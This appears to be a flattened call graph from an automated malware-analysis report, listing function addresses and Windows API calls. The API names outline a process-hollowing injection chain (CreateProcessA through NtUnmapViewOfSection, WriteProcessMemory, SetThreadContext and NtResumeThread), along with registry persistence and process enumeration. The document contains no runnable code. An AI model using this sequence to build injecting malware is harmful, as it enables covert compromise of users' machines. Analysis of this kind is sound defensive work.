20667->20655 20670 2183690 18 API calls 20668->20670 20672 2174bb0 11 API calls 20669->20672 20671 218d5e2 20670->20671 20849 2174dbc 20671->20849 20677 218df3d 20672->20677 20679 2183690 18 API calls 20677->20679 20678 2174c24 11 API calls 20681 218d61d 20678->20681 20680 218df61 20679->20680 20682 218df70 20680->20682 20683 218df81 20680->20683 20684 2174bb0 11 API calls 20681->20684 20685 21748f4 11 API calls 20682->20685 20686 21748f4 11 API calls 20683->20686 20688 218df7f 20683->20688 20687 218d652 20684->20687 20685->20688 20686->20688 20689 2183690 18 API calls 20687->20689 20690 2183690 18 API calls 20688->20690 20691 218d676 ZwClose 20689->20691 20692 218dfc3 20690->20692 20693 2174c24 11 API calls 20691->20693 20694 2174c24 11 API calls 20692->20694 20695 218d6a1 20693->20695 20696 218dfe3 20694->20696 20697 2174bb0 11 API calls 20695->20697 20698 2174bb0 11 API calls 20696->20698 20699 218d6d6 20697->20699 20700 218e018 20698->20700 20701 2183690 18 API calls 20699->20701 20702 2183690 18 API calls 20700->20702 20701->20468 20703 218e03c 20702->20703 20704 2183690 18 API calls 20703->20704 20705 218e06f 20704->20705 20706 2183690 18 API calls 20705->20706 20707 218e0a2 20706->20707 20708 2183690 18 API calls 20707->20708 20709 218e0d5 20708->20709 20710 2174c24 11 API calls 20709->20710 20711 218e0f5 20710->20711 20712 2174bb0 11 API calls 20711->20712 20713 218e12a 20712->20713 20714 2183690 18 API calls 20713->20714 20715 218e14e 20714->20715 20716 2183690 18 API calls 20715->20716 20717 218e188 20716->20717 20718 2183690 18 API calls 20717->20718 20719 218e1c2 20718->20719 20720 2183690 18 API calls 20719->20720 20721 218e1fc 20720->20721 20722 2183690 18 API calls 20721->20722 20723 218e236 20722->20723 20724 2183690 18 API calls 20723->20724 20725 218e270 20724->20725 20726 2183690 18 API calls 20725->20726 20727 218e2aa 20726->20727 20728 2183690 18 API calls 20727->20728 20729 218e2e4 20728->20729 20730 2183690 18 API calls 20729->20730 20731 218e31e 20730->20731 20732 2183690 18 API calls 20731->20732 20733 218e358 20732->20733 20734 2183690 18 API calls 20733->20734 20735 218e392 20734->20735 20736 2183690 18 API calls 20735->20736 20737 218e3cc 20736->20737 20738 2183690 18 API calls 20737->20738 20739 218e406 20738->20739 20740 2174c24 11 API calls 20739->20740 20741 218e426 20740->20741 20742 2174bb0 11 API calls 20741->20742 20743 218e45b 20742->20743 20744 2183690 18 API calls 20743->20744 20745 218e47f 20744->20745 20746 2183690 18 API calls 20745->20746 20747 218e4b9 20746->20747 20748 2183690 18 API calls 20747->20748 20749 218e4f3 20748->20749 20750 2183690 18 API calls 20749->20750 20751 218e52d 20750->20751 20752 2183690 18 API calls 20751->20752 20753 218e567 20752->20753 20754 2183690 18 API calls 20753->20754 20755 218e5a1 20754->20755 20756 2183690 18 API calls 20755->20756 20757 218e5db 20756->20757 20758 2183690 18 API calls 20757->20758 20759 218e615 ExitProcess 20758->20759 20761 2174bb4 20760->20761 20763 2174c15 20760->20763 20762 2174bbc 20761->20762 20764 21748f4 20761->20764 20762->20763 20766 2174bcb 20762->20766 20767 21748f4 11 API calls 20762->20767 20769 2174964 11 API calls 20764->20769 20770 2174908 20764->20770 20765 2174936 20765->20351 20768 2174964 11 API calls 20766->20768 20767->20766 20772 2174be5 20768->20772 20769->20770 20770->20765 20771 2172c5c 11 API calls 20770->20771 20771->20765 20773 21748f4 11 API calls 20772->20773 20774 2174c11 20773->20774 20774->20351 20776 21836a6 20775->20776 20777 21836c7 LoadLibraryA 20776->20777 20778 218374b 20777->20778 20779 21836d3 GetModuleHandleA 20777->20779 21263 21748c4 20778->21263 20780 2183740 FreeLibrary 20779->20780 20781 21836e7 20779->20781 20780->20778 20784 21836f6 GetProcAddress 20781->20784 20785 2183710 20784->20785 20786 2183712 RtlMoveMemory 20784->20786 20785->20786 21267 217304c 20786->21267 20788 218372d GetCurrentProcess NtFlushVirtualMemory 20788->20780 20789 2188e04 20793 2188e29 20789->20793 20790 2188e55 20792 21748a0 11 API calls 20790->20792 20794 2188e6a 20792->20794 20793->20790 21268 2174a88 20793->21268 21271 2174b6c 20793->21271 20794->20356 20797 2189023 20796->20797 20798 218904d RegOpenKeyA 20797->20798 20799 218905b 20798->20799 20800 2174dbc 11 API calls 20799->20800 20801 218906b 20800->20801 20802 2189078 RegSetValueExA RegCloseKey 20801->20802 20803 2189098 20802->20803 20804 21748c4 11 API calls 20803->20804 20805 21890a5 20804->20805 20806 21748a0 11 API calls 20805->20806 20807 21890ad 20806->20807 20807->20360 20817 21888ae 20808->20817 20809 2188950 20810 2174f90 11 API calls 20809->20810 20811 2188965 20810->20811 20812 21748f4 11 API calls 20811->20812 20814 2188970 20812->20814 20813 2174a88 11 API calls 20813->20817 20816 21748a0 11 API calls 20814->20816 20815 2174b6c 11 API calls 20815->20817 20818 2188985 20816->20818 20817->20809 20817->20813 20817->20815 20819 21748c4 11 API calls 20818->20819 20820 2188992 20819->20820 20820->20386 20822 2177d98 20821->20822 20823 2177db9 20822->20823 21290 217791c 20822->21290 20825 2188e78 20823->20825 20826 2188e95 20825->20826 20827 2188ef3 20826->20827 20828 2174a88 11 API calls 20826->20828 20831 2174b6c 11 API calls 20826->20831 20829 21748a0 11 API calls 20827->20829 20828->20826 20830 2188f08 20829->20830 20832 21748a0 11 API calls 20830->20832 20831->20826 20833 2188f10 20832->20833 20833->20404 20835 21748f4 11 API calls 20834->20835 20836 2188c6c 20835->20836 20837 2188cb3 20836->20837 20838 2174dbc 11 API calls 20836->20838 20837->20422 20838->20836 21366 2185770 20839->21366 20841 218580d 21371 2185790 20841->21371 20843 21748c4 11 API calls 20844 21858e8 20843->20844 20844->20559 20845 218588b CompareStringA 20846 21858a4 20845->20846 20847 2185828 20845->20847 20846->20843 20847->20845 20847->20846 21376 21857b0 20847->21376 20850 2174d70 20849->20850 20851 2174dab 20850->20851 20852 2174964 11 API calls 20850->20852 20855 218779c 20851->20855 20853 2174d87 20852->20853 20853->20851 20854 2172c5c 11 API calls 20853->20854 20854->20851 20856 21877a5 20855->20856 20857 21877d9 InetIsOffline 20856->20857 20858 21877f1 20857->20858 20859 21877e3 20857->20859 20861 21877ef 20858->20861 20862 21748f4 11 API calls 20858->20862 20860 21748f4 11 API calls 20859->20860 20860->20861 20863 2174c24 11 API calls 20861->20863 20862->20861 20864 2187816 20863->20864 20865 2174bb0 11 API calls 20864->20865 20866 218783b 20865->20866 20867 2183690 18 API calls 20866->20867 20868 2187856 20867->20868 20869 2174c24 11 API calls 20868->20869 20870 218786f 20869->20870 20871 2174bb0 11 API calls 20870->20871 20872 2187894 20871->20872 20873 2183690 18 API calls 20872->20873 20874 21878af 20873->20874 20875 2174c24 11 API calls 20874->20875 20876 21878c8 20875->20876 20877 2174bb0 11 API calls 20876->20877 20878 21878ed 20877->20878 20879 2183690 18 API calls 20878->20879 20894 2187908 20879->20894 20880 2183690 18 API calls 20881 2187a00 VirtualAlloc 20880->20881 20882 2174c24 11 API calls 20881->20882 20882->20894 20883 2174bb0 11 API calls 20883->20894 20884 2187cc3 20885 2174c24 11 API calls 20884->20885 20886 2187cfa 20885->20886 20887 2174bb0 11 API calls 20886->20887 20888 2187d2b 20887->20888 20890 2183690 18 API calls 20888->20890 20889 2183690 18 API calls 20889->20894 20891 2187d4f 20890->20891 20892 2174c24 11 API calls 20891->20892 20893 2187d6b 20892->20893 20895 2174bb0 11 API calls 20893->20895 20894->20880 20894->20883 20894->20884 20894->20889 20899 2174c24 11 API calls 20894->20899 21385 217cac8 SetErrorMode 20894->21385 20896 2187d9c 20895->20896 20897 2183690 18 API calls 20896->20897 20898 2187dc0 20897->20898 20900 2174c24 11 API calls 20898->20900 20899->20894 20901 2187df7 20900->20901 20902 2174bb0 11 API calls 20901->20902 20903 2187e28 20902->20903 20904 2183690 18 API calls 20903->20904 20905 2187e4c 20904->20905 21389 2186388 20905->21389 20911 2187e75 20912 21883c2 20911->20912 20913 2174c24 11 API calls 20911->20913 20914 21748c4 11 API calls 20912->20914 20917 2187eb9 20913->20917 20915 21883df 20914->20915 21588 2175398 20915->21588 20921 2174bb0 11 API calls 20917->20921 20919 21748c4 11 API calls 20920 2188400 20919->20920 20920->20678 20922 2187eea 20921->20922 20923 2183690 18 API calls 20922->20923 20924 2187f0e 20923->20924 20925 2174c24 11 API calls 20924->20925 20926 2187f4f 20925->20926 20927 2174bb0 11 API calls 20926->20927 20928 2187f80 20927->20928 20929 2183690 18 API calls 20928->20929 20930 2187fa4 20929->20930 20931 2174c24 11 API calls 20930->20931 20932 2187fca 20931->20932 20933 2174bb0 11 API calls 20932->20933 20934 2187ffb 20933->20934 20935 2183690 18 API calls 20934->20935 20936 218801f 20935->20936 20937 2174c24 11 API calls 20936->20937 20938 218803b 20937->20938 20939 2174bb0 11 API calls 20938->20939 20940 218806c 20939->20940 20941 2183690 18 API calls 20940->20941 20942 2188090 20941->20942 20943 2174c24 11 API calls 20942->20943 20944 21880ac 20943->20944 20945 2174bb0 11 API calls 20944->20945 20946 21880dd 20945->20946 20947 2183690 18 API calls 20946->20947 20948 2188101 20947->20948 20949 217cac8 2 API calls 20948->20949 20950 2188121 GetProcAddress FreeLibrary WriteProcessMemory 20949->20950 20951 2174c24 11 API calls 20950->20951 20952 218817d 20951->20952 20953 2174bb0 11 API calls 20952->20953 20954 21881ae 20953->20954 20955 2183690 18 API calls 20954->20955 20956 21881d2 20955->20956 20957 2174c24 11 API calls 20956->20957 20958 21881ee 20957->20958 20959 2174bb0 11 API calls 20958->20959 20960 218821f 20959->20960 20961 2183690 18 API calls 20960->20961 20962 2188243 20961->20962 20963 2174c24 11 API calls 20962->20963 20964 218825f 20963->20964 20965 2174bb0 11 API calls 20964->20965 20966 2188290 20965->20966 20967 2183690 18 API calls 20966->20967 20968 21882b4 20967->20968 20969 2174c24 11 API calls 20968->20969 20970 21882d0 20969->20970 20971 2174bb0 11 API calls 20970->20971 20972 2188301 20971->20972 20973 2183690 18 API calls 20972->20973 20974 2188325 20973->20974 20975 2174c24 11 API calls 20974->20975 20976 2188341 20975->20976 20977 2174bb0 11 API calls 20976->20977 20978 2188372 20977->20978 20979 2183690 18 API calls 20978->20979 20980 2188396 20979->20980 21581 2185b0c 20980->21581 20984 2174d64 20983->20984 20985 2178102 GetFileAttributesA 20984->20985 20986 217810d 20985->20986 20986->20450 20988 2174d64 20987->20988 20989 2178126 GetFileAttributesA 20988->20989 20990 2178131 20989->20990 20990->20441 20990->20454 20992 2177c5c 20991->20992 20993 2174990 11 API calls 20992->20993 20994 2177c64 20993->20994 20994->20491 20996 21748a0 11 API calls 20995->20996 20997 2172fd8 20996->20997 20998 2172fdc GetModuleFileNameA 20997->20998 20999 2172ffa GetCommandLineA 20997->20999 21000 2174990 11 API calls 20998->21000 21001 2173001 20999->21001 21003 2172ff8 21000->21003 21004 2173018 21001->21004 21780 2172ec8 21001->21780 21003->21004 21004->20525 21006 2183998 21005->21006 21007 21839c6 InetIsOffline 21006->21007 21008 21839d0 21007->21008 21009 21839e1 21007->21009 21010 21748f4 11 API calls 21008->21010 21011 21748f4 11 API calls 21009->21011 21012 21839df 21010->21012 21011->21012 21013 2174c24 11 API calls 21012->21013 21014 2183a0d 21013->21014 21015 2174bb0 11 API calls 21014->21015 21016 2183a36 21015->21016 21017 2183690 18 API calls 21016->21017 21020 2183a51 21017->21020 21018 21748c4 11 API calls 21019 218442a 21018->21019 21019->20499 21021 2174c24 11 API calls 21020->21021 21131 2184407 21020->21131 21022 2183ae1 21021->21022 21023 2174bb0 11 API calls 21022->21023 21024 2183b0a 21023->21024 21025 2183690 18 API calls 21024->21025 21026 2183b25 21025->21026 21027 2174c24 11 API calls 21026->21027 21028 2183b42 21027->21028 21029 2174bb0 11 API calls 21028->21029 21030 2183b6b 21029->21030 21031 2183690 18 API calls 21030->21031 21032 2183b86 21031->21032 21033 2183ba6 CreateProcessA 21032->21033 21034 2183bb4 GetThreadContext 21033->21034 21033->21131 21035 2183bd6 21034->21035 21034->21131 21036 2174c24 11 API calls 21035->21036 21037 2183bf3 21036->21037 21038 2174bb0 11 API calls 21037->21038 21039 2183c1c 21038->21039 21040 2183690 18 API calls 21039->21040 21041 2183c37 21040->21041 21042 2174c24 11 API calls 21041->21042 21043 2183c54 21042->21043 21044 2174bb0 11 API calls 21043->21044 21045 2183c7d 21044->21045 21046 2183690 18 API calls 21045->21046 21047 2183c98 ReadProcessMemory 21046->21047 21048 2183ccc 21047->21048 21049 2183df5 VirtualAllocEx 21047->21049 21051 2174c24 11 API calls 21048->21051 21050 2183e1e 21049->21050 21050->21131 21796 21838a0 21050->21796 21054 2183ce9 21051->21054 21053 2183e32 21056 2174c24 11 API calls 21053->21056 21114 2184043 21053->21114 21057 2174bb0 11 API calls 21054->21057 21055 2174c24 11 API calls 21059 218408c 21055->21059 21058 2183e65 21056->21058 21060 2183d12 21057->21060 21061 2174bb0 11 API calls 21058->21061 21062 2174bb0 11 API calls 21059->21062 21063 2183690 18 API calls 21060->21063 21067 2183e91 21061->21067 21066 21840c1 21062->21066 21064 2183d2d 21063->21064 21065 2174c24 11 API calls 21064->21065 21072 2183d4a 21065->21072 21068 2183690 18 API calls 21066->21068 21069 2183690 18 API calls 21067->21069 21070 21840e5 21068->21070 21071 2183eaf 21069->21071 21073 2174c24 11 API calls 21070->21073 21074 2174c24 11 API calls 21071->21074 21075 2174bb0 11 API calls 21072->21075 21076 2184105 21073->21076 21077 2183ecf 21074->21077 21078 2183d73 21075->21078 21080 2174bb0 11 API calls 21076->21080 21079 2174bb0 11 API calls 21077->21079 21081 2183690 18 API calls 21078->21081 21086 2183f04 21079->21086 21085 218413a 21080->21085 21082 2183d8e NtUnmapViewOfSection 21081->21082 21083 2183dd1 VirtualAllocEx 21082->21083 21084 2183da6 VirtualAllocEx 21082->21084 21083->21050 21084->21050 21087 2183690 18 API calls 21085->21087 21088 2183690 18 API calls 21086->21088 21089 218415e 21087->21089 21090 2183f28 21088->21090 21091 217cac8 2 API calls 21089->21091 21092 2174c24 11 API calls 21090->21092 21093 218417e GetProcAddress FreeLibrary 21091->21093 21096 2183f71 21092->21096 21094 21841c4 NtProtectVirtualMemory 21093->21094 21095 2174c24 11 API calls 21094->21095 21098 2184219 21095->21098 21097 2174bb0 11 API calls 21096->21097 21100 2183fa6 21097->21100 21099 2174bb0 11 API calls 21098->21099 21103 218424e 21099->21103 21101 2183690 18 API calls 21100->21101 21102 2183fca 21101->21102 21104 2174c24 11 API calls 21102->21104 21105 2183690 18 API calls 21103->21105 21108 2183fea 21104->21108 21106 2184272 21105->21106 21107 2174c24 11 API calls 21106->21107 21110 2184292 21107->21110 21109 2174bb0 11 API calls 21108->21109 21111 218401f 21109->21111 21112 2174bb0 11 API calls 21110->21112 21113 2183690 18 API calls 21111->21113 21115 21842c7 21112->21115 21113->21114 21114->21055 21116 2183690 18 API calls 21115->21116 21117 21842eb SetThreadContext 21116->21117 21118 2174c24 11 API calls 21117->21118 21119 218431b 21118->21119 21120 2174bb0 11 API calls 21119->21120 21121 2184350 21120->21121 21122 2183690 18 API calls 21121->21122 21123 2184374 21122->21123 21124 2174c24 11 API calls 21123->21124 21125 2184394 21124->21125 21126 2174bb0 11 API calls 21125->21126 21127 21843c9 21126->21127 21128 2183690 18 API calls 21127->21128 21129 21843ed NtResumeThread 21128->21129 21130 2172c5c 11 API calls 21129->21130 21130->21131 21131->21018 21133 21848a8 21132->21133 21134 21848dc InetIsOffline 21133->21134 21135 21848f5 21134->21135 21136 21848e6 21134->21136 21137 21848f3 21135->21137 21138 2174938 11 API calls 21135->21138 21799 2174938 21136->21799 21140 2174c24 11 API calls 21137->21140 21138->21137 21141 218491c 21140->21141 21142 2174bb0 11 API calls 21141->21142 21143 2184942 21142->21143 21144 2183690 18 API calls 21143->21144 21145 218495d VirtualAlloc 21144->21145 21146 2174c24 11 API calls 21145->21146 21147 21849aa 21146->21147 21148 2174bb0 11 API calls 21147->21148 21149 21849d0 21148->21149 21150 2183690 18 API calls 21149->21150 21151 21849eb 21150->21151 21152 2174c24 11 API calls 21151->21152 21153 2184a05 21152->21153 21154 2174bb0 11 API calls 21153->21154 21155 2184a2b 21154->21155 21156 2183690 18 API calls 21155->21156 21157 2184a46 VirtualAlloc 21156->21157 21158 2174c24 11 API calls 21157->21158 21159 2184a86 21158->21159 21160 2174bb0 11 API calls 21159->21160 21161 2184aac 21160->21161 21162 2183690 18 API calls 21161->21162 21163 2184ac7 21162->21163 21164 2174c24 11 API calls 21163->21164 21165 2184ae1 21164->21165 21166 2174bb0 11 API calls 21165->21166 21167 2184b0a 21166->21167 21168 2183690 18 API calls 21167->21168 21169 2184b28 21168->21169 21170 2184b39 VirtualProtect 21169->21170 21171 2174c24 11 API calls 21170->21171 21172 2184b6c 21171->21172 21173 2174bb0 11 API calls 21172->21173 21174 2184b9e 21173->21174 21175 2183690 18 API calls 21174->21175 21176 2184bc2 21175->21176 21177 2174c24 11 API calls 21176->21177 21178 2184bdf 21177->21178 21179 2174bb0 11 API calls 21178->21179 21180 2184c11 21179->21180 21181 2183690 18 API calls 21180->21181 21182 2184c35 21181->21182 21183 2174c24 11 API calls 21182->21183 21184 2184c61 21183->21184 21185 2174bb0 11 API calls 21184->21185 21186 2184c93 21185->21186 21187 2183690 18 API calls 21186->21187 21188 2184cb7 21187->21188 21189 2174c24 11 API calls 21188->21189 21190 2184cd4 21189->21190 21191 2174bb0 11 API calls 21190->21191 21192 2184d06 21191->21192 21193 2183690 18 API calls 21192->21193 21209 2184d2a 21193->21209 21194 2184e8f 21195 2174c24 11 API calls 21194->21195 21197 2184eac 21195->21197 21196 2184e49 VirtualAlloc 21196->21209 21198 2174bb0 11 API calls 21197->21198 21199 2184ede 21198->21199 21200 2183690 18 API calls 21199->21200 21201 2184f02 21200->21201 21202 2174c24 11 API calls 21201->21202 21204 2184f1f 21202->21204 21203 2174c24 11 API calls 21203->21209 21205 2174bb0 11 API calls 21204->21205 21207 2184f51 21205->21207 21206 2174bb0 11 API calls 21206->21209 21208 2183690 18 API calls 21207->21208 21210 2184f75 21208->21210 21209->21194 21209->21196 21209->21203 21209->21206 21212 2183690 18 API calls 21209->21212 21211 2175a04 16 API calls 21210->21211 21213 2184f9c 21211->21213 21212->21209 21214 2174c24 11 API calls 21213->21214 21215 2184fbc 21214->21215 21216 2174bb0 11 API calls 21215->21216 21217 2184fee 21216->21217 21218 2183690 18 API calls 21217->21218 21219 2185012 21218->21219 21220 2174c24 11 API calls 21219->21220 21221 218502f 21220->21221 21222 2174bb0 11 API calls 21221->21222 21223 2185061 21222->21223 21224 2183690 18 API calls 21223->21224 21225 2185085 21224->21225 21243 21850c2 21225->21243 21803 2184764 21225->21803 21227 21851ec 21228 2174c24 11 API calls 21227->21228 21229 2185209 21228->21229 21230 2174bb0 11 API calls 21229->21230 21231 218523b 21230->21231 21232 2183690 18 API calls 21231->21232 21233 218525f 21232->21233 21234 2174c24 11 API calls 21233->21234 21236 218527c 21234->21236 21235 2174c24 11 API calls 21235->21243 21237 2174bb0 11 API calls 21236->21237 21239 21852ae 21237->21239 21238 2174bb0 11 API calls 21238->21243 21240 2183690 18 API calls 21239->21240 21241 21852d2 21240->21241 21244 2174c24 11 API calls 21241->21244 21242 2183690 18 API calls 21242->21243 21243->21227 21243->21235 21243->21238 21243->21242 21245 21851cf VirtualProtect 21243->21245 21246 2185309 21244->21246 21245->21227 21245->21243 21247 2174bb0 11 API calls 21246->21247 21248 218533b 21247->21248 21249 2183690 18 API calls 21248->21249 21250 218535f 21249->21250 21251 2174c24 11 API calls 21250->21251 21252 218537c 21251->21252 21253 2174bb0 11 API calls 21252->21253 21254 21853ae 21253->21254 21255 2183690 18 API calls 21254->21255 21256 21853d2 21255->21256 21257 21748c4 11 API calls 21256->21257 21258 218540e 21257->21258 21259 21748a0 11 API calls 21258->21259 21260 2185416 21259->21260 21261 2175398 13 API calls 21260->21261 21262 2185424 21261->21262 21262->20542 21265 21748ca 21263->21265 21264 21748f0 21264->20789 21265->21264 21266 2172c5c 11 API calls 21265->21266 21266->21265 21267->20788 21285 2174990 21268->21285 21272 2174b70 21271->21272 21273 2174baf 21271->21273 21274 21748f4 21272->21274 21275 2174b7a 21272->21275 21273->20793 21281 2174964 11 API calls 21274->21281 21282 2174908 21274->21282 21276 2174ba4 21275->21276 21277 2174b8d 21275->21277 21278 2174f90 11 API calls 21276->21278 21280 2174f90 11 API calls 21277->21280 21284 2174b92 21278->21284 21279 2174936 21279->20793 21280->21284 21281->21282 21282->21279 21283 2172c5c 11 API calls 21282->21283 21283->21279 21284->20793 21286 2174964 11 API calls 21285->21286 21287 21749a0 21286->21287 21288 21748a0 11 API calls 21287->21288 21289 21749b8 21288->21289 21289->20793 21293 217b278 21290->21293 21292 2177935 21292->20823 21294 217b286 21293->21294 21303 217659c 21294->21303 21296 217b2b0 21309 2178854 21296->21309 21299 21748f4 11 API calls 21300 217b2c9 21299->21300 21301 21748c4 11 API calls 21300->21301 21302 217b2e3 21301->21302 21302->21292 21304 21765ad 21303->21304 21305 21765de 21303->21305 21304->21305 21312 2175af0 21304->21312 21305->21296 21308 2174990 11 API calls 21308->21305 21316 2178868 21309->21316 21313 2175aff 21312->21313 21315 2175b15 LoadStringA 21312->21315 21314 2175aa8 30 API calls 21313->21314 21313->21315 21314->21315 21315->21308 21317 217888e 21316->21317 21320 21788c1 21317->21320 21329 217849c 21317->21329 21319 217892b 21321 2174990 11 API calls 21319->21321 21320->21319 21328 21788de 21320->21328 21322 2178863 21321->21322 21322->21299 21323 217891f 21325 2174f90 11 API calls 21323->21325 21324 21748a0 11 API calls 21324->21328 21325->21322 21326 2174f90 11 API calls 21326->21328 21327 217849c 42 API calls 21327->21328 21328->21323 21328->21324 21328->21326 21328->21327 21333 21784c5 21329->21333 21330 21784d6 21348 21787f3 21330->21348 21333->21330 21335 217857e 11 API calls 21333->21335 21337 21785c6 21333->21337 21345 2178490 21333->21345 21335->21333 21338 21785d7 21337->21338 21342 2178631 21337->21342 21340 21786cf 21338->21340 21338->21342 21339 21787f3 11 API calls 21339->21342 21344 2177c00 21340->21344 21355 217846c 21340->21355 21342->21339 21342->21344 21351 2178414 21342->21351 21344->21333 21346 21748a0 11 API calls 21345->21346 21347 217849a 21346->21347 21347->21333 21349 21748a0 11 API calls 21348->21349 21350 2178800 21349->21350 21350->21320 21352 2178425 21351->21352 21353 217791c 42 API calls 21352->21353 21354 2178465 21353->21354 21354->21342 21356 2178484 21355->21356 21357 2178478 21355->21357 21360 2172d1c 21356->21360 21357->21344 21361 2172cd0 21360->21361 21362 217676c 4 API calls 21361->21362 21363 2172cf5 21361->21363 21362->21363 21364 2172cc4 7 API calls 21363->21364 21365 2172d16 21364->21365 21365->21344 21381 21854f4 21366->21381 21369 218578a 21369->20841 21370 218577f CreateToolhelp32Snapshot 21370->20841 21372 21854f4 17 API calls 21371->21372 21373 218579b 21372->21373 21374 21857aa 21373->21374 21375 218579f Process32First 21373->21375 21374->20847 21375->20847 21377 21854f4 17 API calls 21376->21377 21378 21857bb 21377->21378 21379 21857ca 21378->21379 21380 21857bf Process32Next 21378->21380 21379->20847 21380->20847 21382 2185503 GetModuleHandleA 21381->21382 21384 2185638 21381->21384 21383 2185518 16 API calls 21382->21383 21382->21384 21383->21384 21384->21369 21384->21370 21592 2174d64 21385->21592 21388 217cb16 GetProcAddress FreeLibrary VirtualFree VirtualAllocEx 21388->20894 21390 2186391 21389->21390 21390->21390 21391 21863c6 InetIsOffline 21390->21391 21392 21863de 21391->21392 21393 21863d0 21391->21393 21394 21863dc 21392->21394 21395 21748f4 11 API calls 21392->21395 21396 21748f4 11 API calls 21393->21396 21397 2174c24 11 API calls 21394->21397 21395->21394 21396->21394 21398 2186403 21397->21398 21399 2174bb0 11 API calls 21398->21399 21400 2186428 21399->21400 21401 2183690 18 API calls 21400->21401 21402 2186443 21401->21402 21403 2174c24 11 API calls 21402->21403 21404 218645c 21403->21404 21405 2174bb0 11 API calls 21404->21405 21406 2186481 21405->21406 21407 2183690 18 API calls 21406->21407 21408 218649c 21407->21408 21409 2174c24 11 API calls 21408->21409 21410 21864d2 21409->21410 21411 2174bb0 11 API calls 21410->21411 21412 21864f7 21411->21412 21413 2183690 18 API calls 21412->21413 21414 2186512 21413->21414 21415 2174c24 11 API calls 21414->21415 21416 218652b 21415->21416 21417 2174bb0 11 API calls 21416->21417 21418 2186550 21417->21418 21419 2183690 18 API calls 21418->21419 21420 218656b VirtualAlloc 21419->21420 21421 2174c24 11 API calls 21420->21421 21422 21865ad 21421->21422 21423 2174bb0 11 API calls 21422->21423 21424 21865d2 21423->21424 21425 2183690 18 API calls 21424->21425 21426 21865ed 21425->21426 21427 2174c24 11 API calls 21426->21427 21428 218661a 21427->21428 21429 2174bb0 11 API calls 21428->21429 21430 218663f 21429->21430 21431 2183690 18 API calls 21430->21431 21432 218665a 21431->21432 21433 2174c24 11 API calls 21432->21433 21434 2186673 21433->21434 21435 2174bb0 11 API calls 21434->21435 21436 2186698 21435->21436 21437 2183690 18 API calls 21436->21437 21438 21866b3 21437->21438 21439 217cac8 2 API calls 21438->21439 21440 21866cd GetProcAddress FreeLibrary VirtualAlloc 21439->21440 21441 2174c24 11 API calls 21440->21441 21442 218672f 21441->21442 21443 2174bb0 11 API calls 21442->21443 21444 218675a 21443->21444 21445 2183690 18 API calls 21444->21445 21446 218677e 21445->21446 21447 2174c24 11 API calls 21446->21447 21448 21867b0 21447->21448 21449 2174bb0 11 API calls 21448->21449 21450 21867e1 21449->21450 21451 2183690 18 API calls 21450->21451 21452 2186805 21451->21452 21453 2174c24 11 API calls 21452->21453 21454 2186821 21453->21454 21455 2174bb0 11 API calls 21454->21455 21456 2186852 21455->21456 21457 2183690 18 API calls 21456->21457 21458 2186876 LoadLibraryA GetProcAddress VirtualProtect 21457->21458 21459 2174c24 11 API calls 21458->21459 21460 21868d2 21459->21460 21461 2174bb0 11 API calls 21460->21461 21462 2186903 21461->21462 21463 2183690 18 API calls 21462->21463 21464 2186927 21463->21464 21465 2174c24 11 API calls 21464->21465 21466 2186943 21465->21466 21467 2174bb0 11 API calls 21466->21467 21468 2186974 21467->21468 21469 2183690 18 API calls 21468->21469 21470 2186998 21469->21470 21471 2174c24 11 API calls 21470->21471 21472 21869cd 21471->21472 21473 2174bb0 11 API calls 21472->21473 21474 21869fe 21473->21474 21475 2183690 18 API calls 21474->21475 21476 2186a22 21475->21476 21477 2174c24 11 API calls 21476->21477 21478 2186a3e 21477->21478 21479 2174bb0 11 API calls 21478->21479 21480 2186a6f 21479->21480 21481 2183690 18 API calls 21480->21481 21531 2186a93 21481->21531 21482 2186ef5 21483 2174c24 11 API calls 21482->21483 21484 2186f2c 21483->21484 21485 2174bb0 11 API calls 21484->21485 21486 2186f5d 21485->21486 21487 2183690 18 API calls 21486->21487 21488 2186f81 21487->21488 21490 2174c24 11 API calls 21488->21490 21489 2183690 18 API calls 21489->21531 21491 2186fcb 21490->21491 21492 2174bb0 11 API calls 21491->21492 21493 2186ffc 21492->21493 21494 2183690 18 API calls 21493->21494 21495 2187020 21494->21495 21496 2174c24 11 API calls 21495->21496 21498 218706a 21496->21498 21497 2174c24 11 API calls 21497->21531 21499 2174bb0 11 API calls 21498->21499 21500 218709b 21499->21500 21501 2183690 18 API calls 21500->21501 21502 21870bf 21501->21502 21503 2174c24 11 API calls 21502->21503 21504 2187100 21503->21504 21505 2174bb0 11 API calls 21504->21505 21507 2187131 21505->21507 21506 2174bb0 11 API calls 21506->21531 21508 2183690 18 API calls 21507->21508 21509 2187155 21508->21509 21511 2174c24 11 API calls 21509->21511 21510 2183690 18 API calls 21512 2186da8 VirtualAlloc 21510->21512 21513 2187199 21511->21513 21512->21531 21514 2174bb0 11 API calls 21513->21514 21515 21871ca 21514->21515 21516 2183690 18 API calls 21515->21516 21517 21871ee 21516->21517 21594 2175a04 21517->21594 21520 2187287 21521 2174c24 11 API calls 21520->21521 21524 21872a3 21521->21524 21522 2174c24 11 API calls 21523 2187232 21522->21523 21526 2174bb0 11 API calls 21523->21526 21525 2174bb0 11 API calls 21524->21525 21527 21872d4 21525->21527 21528 2187263 21526->21528 21529 2183690 18 API calls 21527->21529 21530 2183690 18 API calls 21528->21530 21532 21872f8 21529->21532 21530->21520 21531->21482 21531->21489 21531->21497 21531->21506 21531->21510 21533 2174c24 11 API calls 21532->21533 21534 218732a 21533->21534 21535 2174bb0 11 API calls 21534->21535 21536 218735b 21535->21536 21537 2183690 18 API calls 21536->21537 21538 218737f 21537->21538 21539 2174c24 11 API calls 21538->21539 21540 218739b 21539->21540 21541 2174bb0 11 API calls 21540->21541 21542 21873cc 21541->21542 21543 2183690 18 API calls 21542->21543 21544 21873f0 21543->21544 21545 2187415 21544->21545 21597 2185f6c 21544->21597 21547 2174c24 11 API calls 21545->21547 21548 2187432 21547->21548 21549 2174bb0 11 API calls 21548->21549 21550 2187463 21549->21550 21551 2183690 18 API calls 21550->21551 21552 2187487 21551->21552 21553 2174c24 11 API calls 21552->21553 21554 21874a3 21553->21554 21555 2174bb0 11 API calls 21554->21555 21556 21874d4 21555->21556 21557 2183690 18 API calls 21556->21557 21568 21874f8 21557->21568 21558 218764d 21559 21755fc 16 API calls 21558->21559 21561 2187660 21559->21561 21560 2174c24 11 API calls 21560->21568 21562 21748c4 11 API calls 21561->21562 21563 218767d 21562->21563 21564 21748c4 11 API calls 21563->21564 21565 218768d 21564->21565 21572 21755fc 21565->21572 21566 2183690 18 API calls 21566->21568 21567 2174bb0 11 API calls 21567->21568 21568->21558 21568->21560 21568->21566 21568->21567 21569 2183690 18 API calls 21568->21569 21570 21875f3 21569->21570 21571 218760c VirtualProtect 